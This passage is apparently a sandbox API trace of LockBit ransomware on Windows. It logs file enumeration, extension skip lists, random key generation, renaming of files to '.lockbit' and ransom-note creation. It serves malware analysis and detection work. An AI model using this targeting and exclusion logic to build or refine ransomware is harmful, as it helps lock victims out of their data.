0x1ff1e60 [0170.115] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24720) returned 1 [0170.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0170.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0170.117] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0170.941] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0170.941] malloc (_Size=0xa6) returned 0x1fa2ed8 [0170.941] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0170.943] free (_Block=0x1fa2ed8) [0170.943] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0170.943] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0170.943] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0170.943] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ca7e100, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5ca7e100, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7e90, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02748U.BMP", cAlternateFileName="")) returned 1 [0170.943] lstrcmpiW (lpString1=".", lpString2="PH02748U.BMP") returned -1 [0170.943] lstrcmpiW (lpString1="..", lpString2="PH02748U.BMP") returned -1 [0170.943] PathFindExtensionW (pszPath="PH02748U.BMP") returned=".BMP" [0170.943] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0170.943] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0170.943] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0170.943] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0170.943] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0170.943] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0170.943] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0170.943] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0170.943] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0170.943] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0170.943] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0170.944] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0170.944] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0170.944] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02748U.BMP") returned 1 [0170.945] lstrcmpiW (lpString1="ntldr", lpString2="PH02748U.BMP") returned -1 [0170.945] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02748U.BMP") returned -1 [0170.945] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02748U.BMP") returned -1 [0170.945] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02748U.BMP") returned -1 [0170.945] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02748U.BMP") returned 1 [0170.945] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02748U.BMP") returned -1 [0170.945] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0170.945] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP") returned=".BMP" [0170.945] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0170.945] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0170.945] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0170.946] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0170.946] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP.lockbit") returned 72 [0170.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0170.947] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0170.947] malloc (_Size=0x40068) returned 0x3d70450 [0170.947] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=32400) returned 1 [0170.947] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0170.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0170.948] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0170.952] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0170.952] malloc (_Size=0xa6) returned 0x1fa2ed8 [0170.952] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0170.953] free (_Block=0x1fa2ed8) [0170.953] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0170.953] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0170.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0170.953] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3d97700, ftCreationTime.dwHighDateTime=0x1bd4e4b, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd3d97700, ftLastWriteTime.dwHighDateTime=0x1bd4e4b, nFileSizeHigh=0x0, nFileSizeLow=0x8795, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02749G.GIF", cAlternateFileName="")) returned 1 [0170.953] lstrcmpiW (lpString1=".", lpString2="PH02749G.GIF") returned -1 [0170.953] lstrcmpiW (lpString1="..", lpString2="PH02749G.GIF") returned -1 [0170.953] PathFindExtensionW (pszPath="PH02749G.GIF") returned=".GIF" [0170.953] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0170.953] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0170.953] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0170.953] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0170.953] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0170.953] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0170.953] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0170.954] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0170.954] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0170.954] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0170.954] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0170.954] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0170.954] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0170.954] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0170.955] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0170.955] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0170.955] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0170.955] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0170.955] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02749G.GIF") returned 1 [0170.955] lstrcmpiW (lpString1="ntldr", lpString2="PH02749G.GIF") returned -1 [0170.955] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02749G.GIF") returned -1 [0170.955] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02749G.GIF") returned -1 [0170.955] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02749G.GIF") returned -1 [0170.955] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02749G.GIF") returned 1 [0170.955] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02749G.GIF") returned -1 [0170.955] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0170.955] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF") returned=".GIF" [0170.955] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0170.955] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0170.955] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0170.955] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0170.956] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0170.956] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0170.956] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF.lockbit") returned 72 [0170.956] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0170.957] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0170.957] malloc (_Size=0x40068) returned 0x3f70048 [0170.957] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=34709) returned 1 [0170.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.957] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0170.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0170.958] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0170.961] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0170.961] malloc (_Size=0xa6) returned 0x1fa2ed8 [0170.961] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0170.962] free (_Block=0x1fa2ed8) [0170.962] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0170.962] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0170.962] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0170.962] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46018a00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a425410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x46018a00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x8118, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02749U.BMP", cAlternateFileName="")) returned 1 [0170.962] lstrcmpiW (lpString1=".", lpString2="PH02749U.BMP") returned -1 [0170.962] lstrcmpiW (lpString1="..", lpString2="PH02749U.BMP") returned -1 [0170.962] PathFindExtensionW (pszPath="PH02749U.BMP") returned=".BMP" [0170.962] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0170.962] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0170.962] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0170.962] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0170.962] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0170.962] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0170.962] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0170.962] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0170.962] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0170.962] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0170.962] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0170.963] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0170.963] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0170.963] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0170.964] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0170.964] 